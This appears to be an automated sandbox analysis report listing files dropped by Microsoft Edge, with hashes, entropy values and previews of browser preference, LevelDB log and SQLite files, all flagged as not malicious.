                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090701653009998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM7wuF9hDO6vP6O+Htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEb6atbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:B1E33281FC96CFB88C007D0DEA609E34
                                                                                                                                                                                                                                                                                                                          SHA1:59410F20031946D787319DC6E1CDD9EA7EAD2F18
                                                                                                                                                                                                                                                                                                                          SHA-256:4C6618F86470F93A307C58567815A110CE827EF6E580DA251124BC7C9E0DCB67
                                                                                                                                                                                                                                                                                                                          SHA-512:4A172A5FAB051C8A1487EB6738C1BEC69E56206BD31AE3E74C38781348E727A3CE27E42E81C18385FB0980564BD009214C54EA2192E011E1EBA47150AC11BD19
                                                                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.640159940159965
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                                                                                                                                                          MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                                                                                                                                                          SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                                                                                                                                                          SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                                                                                                                                                          SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4495165711602936
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:oz4MvntWYKs+AmjjzPkcQJ4rsmv1GzSqSGNCItHE22vwg1HFD:rMv7Ks+j7kcQi/MSqStItH/2vwaH5
                                                                                                                                                                                                                                                                                                                          MD5:6CB5354CC9B6AC050557E17E388EF719
                                                                                                                                                                                                                                                                                                                          SHA1:B99FAE5BE5079826D52CC438E6DC5617A1560801
                                                                                                                                                                                                                                                                                                                          SHA-256:CBFE3D95B0145EE5157A8A333910268902AAAE37A29B9743AAAF8D76703817CC
                                                                                                                                                                                                                                                                                                                          SHA-512:333406B0C6CC3C6EDBC603007DC592A6DBAE400A9463EF1A629B3B8EE1E592B77AD69E0E53FFD7A6ADEC2F1D08B18BCF435B821EAD3D896997EE197C1220235E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):280
Entropy (8bit):4.132041621771752
Encrypted:false
SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:845CFA59D6B52BD2E8C24AC83A335C66
SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:false
Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (17616), with no line terminators
Category:dropped
Size (bytes):17620
Entropy (8bit):5.493612710690866
Encrypted:false
SSDEEP:384:sthPGKSu4VsbAbkfhVtvGUXBohbGIQwY6WZaTY7u:sTOxuJZfhGUWbGXflaTY7u
MD5:C92DAEE44A4ABBD6F7F3D6D30537EBD0
SHA1:B8B12836F2E3BB55ABD5C04A84B9F1E449CC2240
SHA-256:9BE1F358C01B2D6F99C1515A538079781F4FAB1F0A8D134B9C9BDF5F5B693EC2
SHA-512:B06D92CE8B6E079F33965F8669CA961AE0909E2EED376D0E58EBCA4F812C028766CECD4E94C539F014FE317E413E5CAA363A25B291C400B0A8FCF1C9FA408CE8
Malicious:false
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (17781), with no line terminators
Category:dropped
Size (bytes):17785
Entropy (8bit):5.490123600145908
Encrypted:false
SSDEEP:384:sthPGKSu4VsbAbkfhVtvGUXBohbGIQwY6WhlaTY7u:sTOxuJZfhGUWbGXfraTY7u
MD5:497CC6F0F85209126008B53153E84555
SHA1:8323D50D4D53778EA615F7F4D27221E6DD6E4971
SHA-256:6147AC543C9E76CFC8C46F1D1B146B7AED375BF387ED760C893AB16F2B82518A
SHA-512:E47EBB22E93B250728B83D01CCE2B01B5DF4D972537CA23D3CAF28DDD2E8C0590A8138ABC5B28D3F9771B44327E87A9E8371A65AC7DD85744FCBB8A4B6AD7C8E
Malicious:false
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (1597), with CRLF line terminators
Category:dropped
Size (bytes):115717
Entropy (8bit):5.183660917461099
Encrypted:false
SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:3D8183370B5E2A9D11D43EBEF474B305
SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:false
Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:L:L
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:false
Preview:.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:L:L
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:false
Preview:.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):40470
Entropy (8bit):5.560753544519266
Encrypted:false
SSDEEP:768:CJakCwh7pLGLhgGWPSMfjV8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPjcE0TMkUrwCo:CJakCwXchgGWPSMfjVu1jaSjx5kNCsDt
MD5:FB94C120A460C6DBF8F3B75F09ACEA38
SHA1:A39A52405F9F558420E46D1B63F7CD3545CA2B97
SHA-256:ACE8C49CEADDCD86E99105D08189D7EB16EC71E4CEAEA25E4BA82B382B21B4B0
SHA-512:C7CF43D840EA5BA37ACC9407ABE899127F14DE14C57994D73D5A30B6F99267DEB01536C71DD3C0086A8B38A175708ED0DFE48F99424998D3200CE612CC131CFD
Malicious:false
Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13381172585188217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13381172585188217","location":5,"ma
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):309
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1986099810135125
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:10.124 1fc8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/12-11:23:10.177 1fc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                          Size (bytes):2163821
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.222874028281433
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0996121297314145
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:10.056 194c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/12-11:23:10.058 194c Recovering log #3.2025/01/12-11:23:10.062 194c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0996121297314145
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6un9+q2P923oH+Tcwt9Eh1tIFUtQuRJZmwuuk9VkwO923oH+Tcwt9Eh15LJ:76un9+v4Yeb9Eh16FUtQuRJ/uuk9V5Lw
                                                                                                                                                                                                                                                                                                                          MD5:BD52E4412765FAFA214D87F8B4205842
                                                                                                                                                                                                                                                                                                                          SHA1:93552BC8DFEF641D704A7C7D75DD549B0AE80AB5
                                                                                                                                                                                                                                                                                                                          SHA-256:9543DDBE696626DC0AA0FFCA9E77E66F4D0923A82688A741421B3A7527627DE2
                                                                                                                                                                                                                                                                                                                          SHA-512:E92E635ADD022822FFC97C863C24E8DAC3FE0BCC2F51FE8740BD43F8E51033914D0AC40B246A23EE34579186B70C846A5CA10682EFB8F37A8D25502B197E1A14
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:10.056 194c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/12-11:23:10.058 194c Recovering log #3.2025/01/12-11:23:10.062 194c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.46210309969149516
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuro:TouQq3qh7z3bY2LNW9WMcUvBuro
                                                                                                                                                                                                                                                                                                                          MD5:BDC4C6EEBBDC2EBBF37970382CE1E642
                                                                                                                                                                                                                                                                                                                          SHA1:951C69051ADF135C58872C7EAE209F6B0B41EB93
                                                                                                                                                                                                                                                                                                                          SHA-256:E328AC537F99BA750BAAF1C37AFAE2DC5B61262BE5F7F21C4918631790734706
                                                                                                                                                                                                                                                                                                                          SHA-512:A6ED90E2DFD010FF481BD4B3FC56052DE55D31848AE146B16C601E666BC337C4C81A655252E624947B799CC1882C162F5CC096A54C32B979220A69B1BDA39889
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                                          MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                                          SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                                          SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                                          SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):348
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.157500445156973
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u6+q2P923oH+TcwtnG2tMsIFUtQu+Zmwuu7VkwO923oH+TcwtnG2tMsLJ:76ubv4Yebn9GFUtQu+/uuh5LYebn95J
                                                                                                                                                                                                                                                                                                                          MD5:98B795BF7CCA09107A9B334C55CA9CD3
                                                                                                                                                                                                                                                                                                                          SHA1:F6F91988D10EBC5289586C53662AC25710DA9DF9
                                                                                                                                                                                                                                                                                                                          SHA-256:6B4064928A9C2A702AAB6A2DAAD053CE54EB4588E7188888021F0E09E0D9798D
                                                                                                                                                                                                                                                                                                                          SHA-512:CC3B596AB8FE7BD02C8BB3FB0E6B6BB4630F844FE673F4D362738C6B43ED261A6F171132BF94E5AD848AAC32671FEF0E68667D2436BA467AE5FB83CF1AC0829E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.333 1bc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/12-11:23:05.333 1bc8 Recovering log #3.2025/01/12-11:23:05.334 1bc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):348
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.157500445156973
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u6+q2P923oH+TcwtnG2tMsIFUtQu+Zmwuu7VkwO923oH+TcwtnG2tMsLJ:76ubv4Yebn9GFUtQu+/uuh5LYebn95J
                                                                                                                                                                                                                                                                                                                          MD5:98B795BF7CCA09107A9B334C55CA9CD3
                                                                                                                                                                                                                                                                                                                          SHA1:F6F91988D10EBC5289586C53662AC25710DA9DF9
                                                                                                                                                                                                                                                                                                                          SHA-256:6B4064928A9C2A702AAB6A2DAAD053CE54EB4588E7188888021F0E09E0D9798D
                                                                                                                                                                                                                                                                                                                          SHA-512:CC3B596AB8FE7BD02C8BB3FB0E6B6BB4630F844FE673F4D362738C6B43ED261A6F171132BF94E5AD848AAC32671FEF0E68667D2436BA467AE5FB83CF1AC0829E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.333 1bc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/12-11:23:05.333 1bc8 Recovering log #3.2025/01/12-11:23:05.334 1bc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6126060499006641
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jO0VJDpimL:TO8D4jJ/6Up+SWV
                                                                                                                                                                                                                                                                                                                          MD5:AFF678AED0129C917A27BB4F4A5B25D1
                                                                                                                                                                                                                                                                                                                          SHA1:F1BD5298C49DCF820F98D4C0F5C3E85217969F93
                                                                                                                                                                                                                                                                                                                          SHA-256:AE01A5178511E10A835ADB0FD103579E1CD8B429CDE6E68DC6E62858A09454BA
                                                                                                                                                                                                                                                                                                                          SHA-512:3EB0453AD686A32F09BB420253B649AB269BF121F66F9C8BA234ABAD76A3A30D988271C8BD078B79D09D9161D6B17A9A99AF4D9FD542FE53B4BD9A6987FB45B6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
